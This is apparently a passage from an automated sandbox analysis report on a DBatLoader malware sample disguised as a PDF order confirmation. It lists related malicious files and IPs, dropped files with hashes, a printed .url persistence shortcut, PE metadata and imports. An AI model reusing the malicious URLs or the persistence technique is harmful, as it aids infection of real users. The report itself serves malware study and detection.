                                DOC_CRISTINA _ 24TH_JUNE_2022 _.HTMLGet hashmaliciousBrowse
                                • 104.18.7.145
                                854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                tka30O3OZN.exeGet hashmaliciousBrowse
                                • 188.114.96.3
                                WKD-ASIEjnepbRxO8J.exeGet hashmaliciousBrowse
                                • 37.0.8.61
                                K0s6WyVPOi.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                ZbbyBoNRDc.exeGet hashmaliciousBrowse
                                • 37.0.11.164
                                1bS6sdYO4P.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                TG7K9h4o8V.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                SecuriteInfo.com.Variant.Zusy.427341.31777.exeGet hashmaliciousBrowse
                                • 37.0.14.195
                                SecuriteInfo.com.W32.AIDetectNet.01.17891.exeGet hashmaliciousBrowse
                                • 37.0.8.144
                                FAKTURA.exeGet hashmaliciousBrowse
                                • 37.0.14.205
                                INVOICE01.exeGet hashmaliciousBrowse
                                • 37.0.14.211
                                mSqzcglwLg.exeGet hashmaliciousBrowse
                                • 37.0.8.61
                                Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeGet hashmaliciousBrowse
                                • 37.0.14.195
                                SecuriteInfo.com.Variant.Zusy.427341.3668.exeGet hashmaliciousBrowse
                                • 37.0.14.195
                                C0xM3H9W6k.exeGet hashmaliciousBrowse
                                • 37.0.11.237
                                ETBOdBrV1t.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                CTA047372374723727727273.JPG.exeGet hashmaliciousBrowse
                                • 37.0.11.237
                                New948947878403.exeGet hashmaliciousBrowse
                                • 37.0.14.216
                                INVOICE-No338199.exeGet hashmaliciousBrowse
                                • 37.0.10.141
                                YI52XpVV6Y.exeGet hashmaliciousBrowse
                                • 37.0.8.98
                                b1JqtInfZH.exeGet hashmaliciousBrowse
                                • 37.0.11.164
                                B7DBqrRaFM.exeGet hashmaliciousBrowse
                                • 37.0.11.227

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                37f463bf4616ecd445d4a1937da06e192022-06-24_0837.xlsGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://huhgul.com/Get hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                #U70b9#U51fb#U5b89#U88c5-#U7eb8#U98de#U673a#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00#U5305.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                eVoucher.jsGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                PCehpIwZ3F.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                ziMhCvj0xz.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                reportphishinginvestors_76.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://kmctcoeemergingtechnology.org/vldGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                Invoice.htmlGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                #U260e#Ufe0f message 8340041.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://www.namaraclarkebetheldkb.com/Get hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                FACTURA#FFC64209##FLL#Z0026368#10238360##02-05-2022#24-06-2022.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                DHL_Shipping Documents_pdf_98567.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                #U260e#Ufe0f message 60951000.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                DOC_CRISTINA _ 24TH_JUNE_2022 _.HTMLGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                w9AJD6nRbD.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                http://comicsninja.ninja/Get hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://drive.google.com/file/d/1DxAR4CZ0I3LkRutdy96_RlWfNODG9HBW/view?usp=sharingGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                ATT19158.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                http://u.to/pHYyHAGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\Public\Libraries\Eluiezilfw.exe

                                Download File
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):901632
                                Entropy (8bit):6.877204437689639
                                Encrypted:false
                                SSDEEP:12288:VFAa/jmra7RB+8VL4sckZIRDrtQXLgL7f/Bm+vym2/r3Ayd3soZdKYcSwuY:jV6rk1VL4oIRD6bgXXtvHy1XKly
                                MD5:8E60C68E832622B0EBD88A612898A9F9
                                SHA1:99C8A0DB1608B7F3FE783829F13A6A594554F142
                                SHA-256:6F4628DB14DDCFF78F5B0AD2C62F6791E4B29901EB9EF8A3686A2B7019308A99
                                SHA-512:96DE1DEABDA27BB5B24676D9CBB667B15779A166388FC71C345A11C66A521997244FD0DEDADFCD3BE73F2E3302B0C90F77231907690590D1F3D8107B0F0E9541
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Eluiezilfw.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 22%
                                Reputation:low
                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*................. ..........X:.......@....@..........................P...................@...............................,......<.......................x...................................................L................................text............................... ..`.itext.......0...................... ..`.data...D,...@.......$..............@....bss.....8...p.......R...................idata...,...........R..............@....tls....@................................rdata..............................@..@.reloc..x...........................@..B.rsrc...<............ ..............@..@.............P......................@..@................................................................................................

                                C:\Users\Public\Libraries\Eluiezilfw.exe:Zone.Identifier

                                Download File
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:[ZoneTransfer]....ZoneId=0

                                C:\Users\Public\Libraries\wflizeiulE.url

                                Download File
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Eluiezilfw.exe">), ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):103
                                Entropy (8bit):5.011960120240937
                                Encrypted:false
                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM3tJHysGKd8V+K+qvn:HRYFVmTWDyzUtJHysbTK+Un
                                MD5:D16E6F915215004FD953F38105469F43
                                SHA1:CA05489EF9AFCE552299CE05CB029C069C584FC9
                                SHA-256:1C8419346F48517D46B9281EAD00F10D55E2BBC8B3EC2B9B25FA45ADC61D8827
                                SHA-512:D89168D4CFC4E29E7585B31C3F926F9973D98EC47B15F9660AAD33C6A39D458F0D07A18A0C8C83602D4BFE04651D20AB473D69CF760D5EF28276FC8FA651C588
                                Malicious:false
                                Yara Hits:
                                • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\wflizeiulE.url, Author: @itsreallynick (Nick Carr)
                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\wflizeiulE.url, Author: @itsreallynick (Nick Carr)
                                Reputation:low
                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Eluiezilfw.exe"..IconIndex=40..HotKey=878..

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Eluiezilfwmdrgrdfrqpnwmurrnwnhm[1]

                                Download File
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):279040
                                Entropy (8bit):7.595146817608574
                                Encrypted:false
                                SSDEEP:6144:5Htw4G6ymcP6lLkahkaaHTEFBYt+mzZGTxIM9d70gXf8lxBy1q:/6dzHTKBYtXZ26gdogK8q
                                MD5:7D74AF495B07AAD93486870343B767E3
                                SHA1:32123E362E845DDE988E09A5A4309172C9762201
                                SHA-256:152076F0A4EAEDD3FFDC4022C8E0F5850F9B2DEFFFFCBFE1E2B720096CF9600D
                                SHA-512:28BC9AD9021A9B0D38F03BF8D424813CB00DFE85AA272C3C38345A7FC78C6E8A905D90F5D2DA6019CE3E7A1F129F4633127C26BF8EC0710311866725899BEDD6
                                Malicious:false
                                Reputation:low
                                Preview:(..%.%%%)%%%..%%.%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.%%3..3%.....q..y.DNE..JB.<HE><..J.E.@E.P.ED.Ei*.EHJ.@S../I%%%%%%%..=....................X..................c.......}.X.....c.;......R........~....lX.G....l.......O.....R.......wD>....u %%q..%.O%%%%%%%%.%....'.%..%%.'%%%%%.n.%%5%%%..%%%e%%5%%%'%%)%%%%%%%)%%%%%%%%.)%%-%%%%%%'%.%%%%%%%%%%%5%%5%%%%%%5%%%%%%%%%%%%..%..%%%u'%.c'%%%%%%%%%%%%%%%%%%%'%.G%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%SSSS%%%%...%%5%%%..%%)%%%%%%%%%%%%%%E%%.SSSS%%%%y5%%%..%%7%%%..%%%%%%%%%%%%%e%%.SSS%%%%%..%%%..%%%%%%..%%%%%%%%%%%%%%%%.SSSSSS%%..%%%..%%3%%%..%%%%%%%%%%%%%e%%.SSSSSS%%.G%%%%'%%I%%%..%%%%%%%%%%%%%e%%uSSSSS%%%.5%%%U'%%7%%%..%%%%%%%%%%%%%e%%uS.N.>%%%.c'%%u'%%e'%%''%%%%%%%%%%%%%e%%e%%%%%%%%%%%%%u'%%%%%%+'%%%%%%%%%%%%%e%%u%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Eluiezilfwmdrgrdfrqpnwmurrnwnhm[1]

                                Download File
                                Process:C:\Users\Public\Libraries\Eluiezilfw.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):279040
                                Entropy (8bit):7.595146817608574
                                Encrypted:false
                                SSDEEP:6144:5Htw4G6ymcP6lLkahkaaHTEFBYt+mzZGTxIM9d70gXf8lxBy1q:/6dzHTKBYtXZ26gdogK8q
                                MD5:7D74AF495B07AAD93486870343B767E3
                                SHA1:32123E362E845DDE988E09A5A4309172C9762201
                                SHA-256:152076F0A4EAEDD3FFDC4022C8E0F5850F9B2DEFFFFCBFE1E2B720096CF9600D
                                SHA-512:28BC9AD9021A9B0D38F03BF8D424813CB00DFE85AA272C3C38345A7FC78C6E8A905D90F5D2DA6019CE3E7A1F129F4633127C26BF8EC0710311866725899BEDD6
                                Malicious:false
                                Preview:(..%.%%%)%%%..%%.%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.%%3..3%.....q..y.DNE..JB.<HE><..J.E.@E.P.ED.Ei*.EHJ.@S../I%%%%%%%..=....................X..................c.......}.X.....c.;......R........~....lX.G....l.......O.....R.......wD>....u %%q..%.O%%%%%%%%.%....'.%..%%.'%%%%%.n.%%5%%%..%%%e%%5%%%'%%)%%%%%%%)%%%%%%%%.)%%-%%%%%%'%.%%%%%%%%%%%5%%5%%%%%%5%%%%%%%%%%%%..%..%%%u'%.c'%%%%%%%%%%%%%%%%%%%'%.G%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%SSSS%%%%...%%5%%%..%%)%%%%%%%%%%%%%%E%%.SSSS%%%%y5%%%..%%7%%%..%%%%%%%%%%%%%e%%.SSS%%%%%..%%%..%%%%%%..%%%%%%%%%%%%%%%%.SSSSSS%%..%%%..%%3%%%..%%%%%%%%%%%%%e%%.SSSSSS%%.G%%%%'%%I%%%..%%%%%%%%%%%%%e%%uSSSSS%%%.5%%%U'%%7%%%..%%%%%%%%%%%%%e%%uS.N.>%%%.c'%%u'%%e'%%''%%%%%%%%%%%%%e%%e%%%%%%%%%%%%%u'%%%%%%+'%%%%%%%%%%%%%e%%u%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.877204437689639
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                • Windows Screen Saver (13104/52) 0.13%
                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                File name:Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File size:901632
                                MD5:8e60c68e832622b0ebd88a612898a9f9
                                SHA1:99c8a0db1608b7f3fe783829f13a6a594554f142
                                SHA256:6f4628db14ddcff78f5b0ad2c62f6791e4b29901eb9ef8a3686a2b7019308a99
                                SHA512:96de1deabda27bb5b24676d9cbb667b15779a166388fc71c345a11c66a521997244fd0dedadfcd3be73f2e3302b0c90f77231907690590d1f3d8107b0f0e9541
                                SSDEEP:12288:VFAa/jmra7RB+8VL4sckZIRDrtQXLgL7f/Bm+vym2/r3Ayd3soZdKYcSwuY:jV6rk1VL4oIRD6bgXXtvHy1XKly
                                TLSH:FB159E25F6C04437C5F21D755C4BA2A59837BF112E2CAC866BE53E4D3F3AA81382D297
                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                File Icon

                                Icon Hash:74e08889828b84d4

                                Static PE Info

                                General

                                Entrypoint:0x4a3a58
                                Entrypoint Section:.itext
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                DLL Characteristics:
                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:5280055d457e9ca268949d0a6c7d827a

                                Entrypoint Preview

                                Instruction
                                push ebp
                                mov ebp, esp
                                add esp, FFFFFFF0h
                                mov eax, 004A1F80h
                                call 00007F953C66CF31h
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                call 00007F953C6CD89Dh
                                mov ecx, dword ptr [004A6C00h]
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                mov edx, dword ptr [004A1ADCh]
                                call 00007F953C6CD89Dh
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                mov byte ptr [eax+5Bh], 00000000h
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                call 00007F953C6CD906h
                                call 00007F953C66AA8Dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xab0000x2c80.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x2a13c.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000x9d78.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0xaf0000x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0xab84c0x6e4.idata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000xa12880xa1400False0.5252316497093024data6.580947017578751IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .itext0xa30000xab00xc00False0.556640625data5.90726865777267IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .data0xa40000x2c440x2e00False0.4107506793478261data4.2710329018780255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .bss0xa70000x38d80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata0xab0000x2c800x2e00False0.31326426630434784data5.123456156924204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .tls0xae0000x400x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rdata0xaf0000x180x200False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xb00000x9d780x9e00False0.5820065268987342data6.661487991041825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                .rsrc0xba0000x2a13c0x2a200False0.42494088464391694data6.66870756771348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                AUDIO0xbabe80x21944RIFF (little-endian) data, WAVE audio, Microsoft ADPCM, mono 22050 HzEnglishUnited States
                                RT_CURSOR0xdc52c0x134dataEnglishUnited States
                                RT_CURSOR0xdc6600x134dataEnglishUnited States
                                RT_CURSOR0xdc7940x134dataEnglishUnited States
                                RT_CURSOR0xdc8c80x134dataEnglishUnited States
                                RT_CURSOR0xdc9fc0x134dataEnglishUnited States
                                RT_CURSOR0xdcb300x134dataEnglishUnited States
                                RT_CURSOR0xdcc640x134dataEnglishUnited States
                                RT_BITMAP0xdcd980x1d0dataEnglishUnited States
                                RT_BITMAP0xdcf680x1e4dataEnglishUnited States
                                RT_BITMAP0xdd14c0x1d0dataEnglishUnited States
                                RT_BITMAP0xdd31c0x1d0dataEnglishUnited States
                                RT_BITMAP0xdd4ec0x1d0dataEnglishUnited States
                                RT_BITMAP0xdd6bc0x1d0dataEnglishUnited States
                                RT_BITMAP0xdd88c0x1d0dataEnglishUnited States
                                RT_BITMAP0xdda5c0x1d0dataEnglishUnited States
                                RT_BITMAP0xddc2c0x1d0dataEnglishUnited States
                                RT_BITMAP0xdddfc0x1d0dataEnglishUnited States
                                RT_BITMAP0xddfcc0xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                RT_ICON0xde0b40x1200data
                                RT_ICON0xdf2b40xa00data
                                RT_ICON0xdfcb40x600GLS_BINARY_LSB_FIRST
                                RT_DIALOG0xe02b40x52data
                                RT_DIALOG0xe03080x52data
                                RT_STRING0xe035c0xd8data
                                RT_STRING0xe04340x450data
                                RT_STRING0xe08840x53cdata
                                RT_STRING0xe0dc00x2acdata
                                RT_STRING0xe106c0xc8data
                                RT_STRING0xe11340x108data
                                RT_STRING0xe123c0x2a8data
                                RT_STRING0xe14e40x3e8data
                                RT_STRING0xe18cc0x390data
                                RT_STRING0xe1c5c0x370data
                                RT_STRING0xe1fcc0x390data
                                RT_STRING0xe235c0xd0data
                                RT_STRING0xe242c0xa0data
                                RT_STRING0xe24cc0x2b8data
                                RT_STRING0xe27840x474data
                                RT_STRING0xe2bf80x38cdata
                                RT_STRING0xe2f840x2b4data
                                RT_RCDATA0xe32380x10data
                                RT_RCDATA0xe32480x2d8data
                                RT_RCDATA0xe35200xb5eDelphi compiled form 'T__691934005'
                                RT_GROUP_CURSOR0xe40800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                RT_GROUP_CURSOR0xe40940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                RT_GROUP_CURSOR0xe40a80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                RT_GROUP_CURSOR0xe40bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                RT_GROUP_CURSOR0xe40d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                RT_GROUP_CURSOR0xe40e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                RT_GROUP_CURSOR0xe40f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                RT_GROUP_ICON0xe410c0x30data

                                Imports

                                DLLImport
                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, NotifyWinEvent, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
